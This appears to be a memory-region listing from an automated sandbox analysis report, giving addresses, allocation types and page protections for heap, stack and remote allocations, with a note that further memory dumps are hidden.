page read and write
20890100000
heap
page read and write
7740000
trusted library allocation
page execute and read and write
7FF848F20000
trusted library allocation
page read and write
2089012F000
heap
page read and write
61F0000
heap
page read and write
208901E8000
heap
page read and write
20891FCE000
heap
page read and write
208901CD000
heap
page read and write
5F64000
heap
page read and write
3040000
heap
page read and write
6110000
direct allocation
page read and write
2182E000
stack
page read and write
5F63000
heap
page read and write
8463000
heap
page read and write
4B40000
heap
page read and write
780E000
stack
page read and write
E39000
heap
page read and write
20891FB5000
heap
page read and write
2B43F75A000
heap
page read and write
8600000
trusted library allocation
page read and write
218BC000
stack
page read and write
7FF848BC3000
trusted library allocation
page execute and read and write
20891E86000
heap
page read and write
2B427297000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
20891F83000
heap
page read and write
6120000
direct allocation
page read and write
2B425420000
heap
page read and write
5FA8000
heap
page read and write
2B4254B1000
heap
page read and write
F9B698E000
stack
page read and write
2B428DF0000
trusted library allocation
page read and write
2B425477000
heap
page read and write
20891E86000
heap
page read and write
71F8000
heap
page read and write
30C4000
trusted library allocation
page read and write
792B000
stack
page read and write
20891E50000
heap
page read and write
5F63000
heap
page read and write
75A0000
heap
page read and write
2B43F72E000
heap
page read and write
8940000
trusted library allocation
page read and write
7FF848DA7000
trusted library allocation
page read and write
F9B5E3E000
stack
page read and write
20891E52000
heap
page read and write
4A00000
heap
page read and write
F9B55EF000
stack
page read and write
2B43F440000
heap
page read and write
F9B59FE000
stack
page read and write
2B4253F0000
heap
page read and write
F9B54E3000
stack
page read and write
785BDFE000
stack
page read and write
89A0000
direct allocation
page read and write
2FF0000
direct allocation
page read and write
2B426EE0000
trusted library allocation
page read and write
5F67000
heap
page read and write
7664000
heap
page read and write
2B428E07000
trusted library allocation
page read and write
D60000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
2B428E2D000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
20890162000
heap
page read and write
4ADF000
stack
page read and write
7FF848E80000
trusted library allocation
page read and write
2B426F30000
heap
page read and write
F9B556E000
stack
page read and write
83D0000
trusted library allocation
page read and write
7FF848F30000
trusted library allocation
page read and write
20890193000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
2B43F430000
heap
page execute and read and write
883C000
stack
page read and write
20891E58000
heap
page read and write
20891E63000
heap
page read and write
2B43F505000
heap
page read and write
2B425825000
heap
page read and write
5CF5000
trusted library allocation
page read and write
82C0000
trusted library allocation
page execute and read and write
20891EB7000
heap
page read and write
2FD0000
heap
page readonly
784D000
stack
page read and write
2B428E88000
trusted library allocation
page read and write
5B0F000
remote allocation
page execute and read and write
2B4257E5000
heap
page read and write
D11000
heap
page read and write
2B4274E9000
trusted library allocation
page read and write
7FF848ED0000
trusted library allocation
page read and write
2B427060000
heap
page execute and read and write
2B4270F7000
trusted library allocation
page read and write
785C2FE000
stack
page read and write
8920000
trusted library allocation
page read and write
2186F000
stack
page read and write
5F9D000
heap
page read and write
49CC000
stack
page read and write
7780000
trusted library allocation
page read and write
208901EC000
heap
page read and write
E35000
heap
page read and write
76EE000
stack
page read and write
C78000
stack
page read and write
51DF000
trusted library allocation
page read and write
6F0E000
stack
page read and write
83E0000
trusted library allocation
page read and write
7860000
trusted library allocation
page read and write
7880000
trusted library allocation
page read and write
7FF848F50000
trusted library allocation
page read and write
D05000
heap
page read and write
6140000
direct allocation
page read and write
5BB6000
trusted library allocation
page read and write
20891F74000
heap
page read and write
20891F83000
heap
page read and write
7050000
direct allocation
page read and write
2B43F950000
heap
page read and write
20891EB7000
heap
page read and write
492E000
stack
page read and write
510F000
remote allocation
page execute and read and write
20891FB6000
heap
page read and write
7FF848C7C000
trusted library allocation
page execute and read and write
20890395000
heap
page read and write
CDD000
heap
page read and write
30D9000
trusted library allocation
page read and write
785C4FB000
stack
page read and write
7750000
trusted library allocation
page read and write
844F000
heap
page read and write
8970000
trusted library allocation
page read and write
496F000
stack
page read and write
5FA1000
heap
page read and write
4B1E000
stack
page read and write
785C0FE000
stack
page read and write
6150000
direct allocation
page read and write
20891E86000
heap
page read and write
4A4E000
stack
page read and write
2B427569000
trusted library allocation
page read and write
2B437359000
trusted library allocation
page read and write
5B51000
trusted library allocation
page read and write
78A0000
trusted library allocation
page read and write
30F2000
trusted library allocation
page read and write
470F000
remote allocation
page execute and read and write
2B428E47000
trusted library allocation
page read and write
7FF848C80000
trusted library allocation
page execute and read and write
2B428DF3000
trusted library allocation
page read and write
2B4254AF000
heap
page read and write
745F000
stack
page read and write
F9B5BBE000
stack
page read and write
25630000
direct allocation
page read and write
7FF848BC2000
trusted library allocation
page read and write
5FA1000
heap
page read and write
5F36000
heap
page read and write
4A08000
heap
page read and write
78E0000
trusted library allocation
page read and write
2B428ED8000
trusted library allocation
page read and write
7FF848BC0000
trusted library allocation
page read and write
8310000
trusted library allocation
page execute and read and write
F9B5FBB000
stack
page read and write
A7AF000
direct allocation
page execute and read and write
30E0000
trusted library allocation
page read and write
20891F75000
heap
page read and write
7770000
trusted library allocation
page read and write
7FF848D71000
trusted library allocation
page read and write
2168C000
stack
page read and write
2F80000
heap
page read and write
7FF848D7A000
trusted library allocation
page read and write
2B43F5B0000
heap
page execute and read and write
2B437091000
trusted library allocation
page read and write
2B427C13000
trusted library allocation
page read and write
208901E4000
heap
page read and write
F9B6A0D000
stack
page read and write
5B79000
trusted library allocation
page read and write
8620000
trusted library allocation
page read and write
20891E62000
heap
page read and write
7492000
heap
page read and write
785BAFE000
stack
page read and write
208901CD000
heap
page read and write
F9B5DBE000
stack
page read and write
7080000
direct allocation
page read and write
8980000
direct allocation
page read and write
741E000
stack
page read and write
208900A0000
heap
page read and write
76A0000
trusted library allocation
page read and write
20891E77000
heap
page read and write
82D0000
trusted library allocation
page read and write
2164D000
stack
page read and write
2B437080000
trusted library allocation
page read and write
2B426EA0000
trusted library allocation
page read and write
8488000
heap
page read and write
2FC0000
heap
page read and write
7090000
direct allocation
page read and write
7FF848C76000
trusted library allocation
page read and write
2B43F787000
heap
page read and write
2B428651000
trusted library allocation
page read and write
215DF000
stack
page read and write
887C000
stack
page read and write
F9B5CB7000
stack
page read and write
2B42752B000
trusted library allocation
page read and write
7FF848DA2000
trusted library allocation
page read and write
2B43F4F6000
heap
page read and write
8930000
trusted library allocation
page read and write
217F0000
remote allocation
page read and write
9DAF000
direct allocation
page execute and read and write
20890130000
heap
page read and write
83C0000
trusted library allocation
page read and write
7FF848E40000
trusted library allocation
page read and write
7020000
direct allocation
page read and write
20891E6B000
heap
page read and write
208901E4000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
20891E55000
heap
page read and write
2B427505000
trusted library allocation
page read and write
3090000
trusted library section
page read and write
2B425820000
heap
page read and write
F9B5C37000
stack
page read and write
7FF848CE0000
trusted library allocation
page execute and read and write
208901DA000
heap
page read and write
20891FBC000
heap
page read and write
30C0000
trusted library allocation
page read and write
7FF848EF0000
trusted library allocation
page read and write
20890170000
heap
page read and write
DC2000
heap
page read and write
20890080000
heap
page read and write
30F0000
trusted library allocation
page read and write
5F52000
heap
page read and write
785C3FF000
stack
page read and write
7FF848E70000
trusted library allocation
page read and write
2B437071000
trusted library allocation
page read and write
2B426E70000
trusted library allocation
page read and write
20891F70000
heap
page read and write
6100000
direct allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
5F63000
heap
page read and write
20891E7A000
heap
page read and write
F9B5EBE000
stack
page read and write
20890170000
heap
page read and write
7FF848D90000
trusted library allocation
page execute and read and write
7580000
heap
page read and write
7FF848CA6000
trusted library allocation
page execute and read and write
217F0000
remote allocation
page read and write
208901FD000
heap
page read and write
7870000
trusted library allocation
page read and write
208901E2000
heap
page read and write
2F90000
heap
page read and write
2B43F79C000
heap
page read and write
2B43F79A000
heap
page read and write
6F4F000
stack
page read and write
208901D0000
heap
page read and write
7606000
heap
page read and write
89F0000
direct allocation
page read and write
2B428D44000
trusted library allocation
page read and write
785BEFF000
stack
page read and write
83BE000
stack
page read and write
208901CD000
heap
page read and write
4BB3000
trusted library allocation
page read and write
2B4274FD000
trusted library allocation
page read and write
841A000
heap
page read and write
218FD000
stack
page read and write
5FA1000
heap
page read and write
F9B587E000
stack
page read and write
20891F90000
heap
page read and write
2159E000
stack
page read and write
8432000
heap
page read and write
21900000
direct allocation
page read and write
F9B5F3F000
stack
page read and write
8950000
trusted library allocation
page read and write
2EDC000
stack
page read and write
208901CD000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
208901EF000
heap
page read and write
2B428E16000
trusted library allocation
page read and write
5EE0000
direct allocation
page read and write
208901F5000
heap
page read and write
2B425400000
heap
page read and write
214AF000
stack
page read and write
48E0000
heap
page execute and read and write
844B000
heap
page read and write
61DE000
stack
page read and write
2B4254C7000
heap
page read and write
20890130000
heap
page read and write
2B4254EF000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
2FC5000
heap
page read and write
6180000
direct allocation
page read and write
20891E60000
heap
page read and write
785B7EA000
stack
page read and write
78D0000
trusted library allocation
page read and write
3D0F000
remote allocation
page execute and read and write
20891EB7000
heap
page read and write
7FF848C70000
trusted library allocation
page read and write
7FF848D80000
trusted library allocation
page execute and read and write
49D0000
trusted library allocation
page execute and read and write
2B428E12000
trusted library allocation
page read and write
3200000
remote allocation
page execute and read and write
20891E86000
heap
page read and write
2B427516000
trusted library allocation
page read and write
7FF848DA5000
trusted library allocation
page read and write
71E0000
heap
page read and write
2B43F4F9000
heap
page read and write
20891A10000
heap
page read and write
F9B5A7E000
stack
page read and write
2B43F437000
heap
page execute and read and write
2B4257E0000
heap
page read and write
208901D3000
heap
page read and write
7040000
direct allocation
page read and write
208901F9000
heap
page read and write
2B4254F5000
heap
page read and write
78B0000
trusted library allocation
page read and write
89E0000
trusted library allocation
page execute and read and write
C7D000
stack
page read and write
785C1FE000
stack
page read and write
49E0000
trusted library allocation
page read and write
2B425810000
trusted library allocation
page read and write
2B426E60000
heap
page readonly
C3C000
stack
page read and write
2B4275CA000
trusted library allocation
page read and write
2B428E9C000
trusted library allocation
page read and write
7FF848DB0000
trusted library allocation
page execute and read and write
30C3000
trusted library allocation
page execute and read and write
7DF445700000
trusted library allocation
page execute and read and write
785BBFE000
stack
page read and write
83F0000
trusted library allocation
page read and write
20891E86000
heap
page read and write
4B51000
trusted library allocation
page read and write
2B428E84000
trusted library allocation
page read and write
F9B597C000
stack
page read and write
48D0000
heap
page readonly
93AF000
direct allocation
page execute and read and write
5FA3000
heap
page read and write
7FF848EE0000
trusted library allocation
page read and write
F9B5AFE000
stack
page read and write
20891FCA000
heap
page read and write
2B426F47000
heap
page read and write
48C0000
trusted library allocation
page read and write
D65000
heap
page read and write
20891FB2000
heap
page read and write
There are 465 hidden memdumps, click here to show them.